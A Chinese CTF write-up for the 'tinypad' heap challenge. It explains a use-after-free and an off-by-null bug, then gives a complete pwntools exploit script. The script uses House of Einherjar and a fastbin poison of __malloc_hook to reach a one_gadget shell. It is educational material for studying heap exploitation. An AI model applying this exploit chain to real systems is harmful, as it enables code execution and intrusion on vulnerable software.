checksec下:
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
程序操作
添加memo: 申请的大小范围:1 - 0x100
删除memo: 存在UAF
编辑memo:
使用read_until函数读取memo内容,该函数有off-by-null
程序数据存储:
tinypad+256起存储memos
每个memo是0x10字节:
8字节:memo长度
8字节:指向memo内容
pwn脚本
思路:通过off-by-null,利用House of Einherjar构造overlapping chunk,再覆盖fast chunk的fd指针,指向__malloc_hook附近,将__malloc_hook覆盖成one_gadget。
tinypad_pwn.py:
# -*-coding:utf-8-*-
from pwn import *
import pdb
# context.log_level = "debug"
def add_memo(p, size, content):
p.recvuntil("(CMD)>>>")
p.sendline("A")
p.recvuntil("(SIZE)>>>")
p.sendline(str(size))
p.recvuntil("(CONTENT)>>>")
p.sendline(content)
def delete_memo(p, idx):
p.recvuntil("(CMD)>>>")
p.sendline("D")
p.recvuntil("(INDEX)>>>")
p.sendline(str(idx))
def edit_memo(p, idx, content):
p.recvuntil("(CMD)>>>")
p.sendline("E")
p.recvuntil("(INDEX)>>>")
p.sendline(str(idx))
p.recvuntil("(CONTENT)>>>")
p.sendline(content)
p.recvuntil("(Y/n)>>>")
p.sendline("Y")
p = process("./tinypad")
# 第一步: 利用UAF泄露heap地址和libc基址
add_memo(p, 0x60, "A" * 0x10) # fast chunk
add_memo(p, 0x60, "B" * 0x10) # fast chunk
add_memo(p, 0xf0, "C" * 0x10) # unsorted chunk
add_memo(p, 0x80, "D" * 0x10)
delete_memo(p, 3)
delete_memo(p, 2)
delete_memo(p, 1)
p.recvuntil("INDEX: 1")
p.recvuntil("CONTENT: ")
addr_heap = u64(p.recvuntil("\n", drop=True).ljust(8, "\x00"))
log.success("addr_heap: " + hex(addr_heap))
p.recvuntil("INDEX: 3")
p.recvuntil("CONTENT: ")
addr_unsorted_bin = u64(p.recvuntil("\n", drop=True).ljust(8, "\x00"))
log.success("addr_unsorted_bin: " + hex(addr_unsorted_bin))
addr_libc = addr_unsorted_bin - 0x3c4b78 # Fix You
log.success("addr_libc: " + hex(addr_libc))
addr_malloc_hook = addr_libc + 0x3C4B10 # Fix You
addr_fake_fastchunk = addr_malloc_hook - 0x23
one_gadget = addr_libc + 0xf1147 # 该one_gadget需满足[rsp+0x70] == NULL # Fix You
# 第二步: 利用House Of Einherjar构造overlapping chunk
add_memo(p, 0xf0, "C" * 0x10) # use unsorted chunk (index: 1)
add_memo(p, 0x60, p64(0) + p64(0xd0) + p64(addr_heap - 0x60) + p64(addr_heap - 0x60)) # fake chunk (index: 2)
add_memo(p, 0x68, "B" * 0x60 + p64(0xd0)) # off-by-one (index: 3, will be overlapping chunk)
'''此时堆从低地址到高地址的分布:
fake chunk -- AAAA ---- (index: 2)
用于执行off-by-one的chunk -- BBBB ---- (index: 3)
用于free的chunk -- CCCC ---- (index: 1)
靠top chunk的chunk -- DDDD ---- (index: 4)
'''
delete_memo(p, 1) # free to consolidate backward
delete_memo(p, 3) # add this overlapping chunk to fastbin
# 第三步: 覆盖fastbin上的chunk的fd指针,指向__malloc_hook附近区域
add_memo(p, 0x90, "E" * 0x50 + p64(0) + p64(0x71) + p64(addr_fake_fastchunk)) # (index: 1)
'''
因为最多只能有4个memo,这里需要删除一个,后面才能申请到两个memo
这里不能调delete_memo(p, 4), 因为要释放调这个靠top chunk的chunk,其会跟top chunk合并,下面的size变量会加上top chunk的大小,从而满足下面的条件
if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
if (have_fastchunks(av))
malloc_consolidate(av);
...
}
就会调用到malloc_consolidate函数。而在这个函数里处理fastbin chunk时会调用到unlink,而unlink时会检查被unlink的chunk的size和prev_size,这个检查通不过。
'''
delete_memo(p, 1)
add_memo(p, 0x60, "F" * 0x10) # (index: 1)
add_memo(p, 0x60, "X" * (addr_malloc_hook - addr_fake_fastchunk - 0x10) + p64(one_gadget)) # (index: 2)
# 第四步: 调用malloc, 触发one_gadget
delete_memo(p, 2)
p.recvuntil("(CMD)>>>")
p.sendline("A")
p.recvuntil("(SIZE)>>>")
p.sendline(str(0x10))
p.interactive()
运行上面的脚本前需根据自己的libc版本来修改几个硬编码值,脚本里用Fix You标注出。
附:这里有个思路是跟上面稍微有些不同
网友评论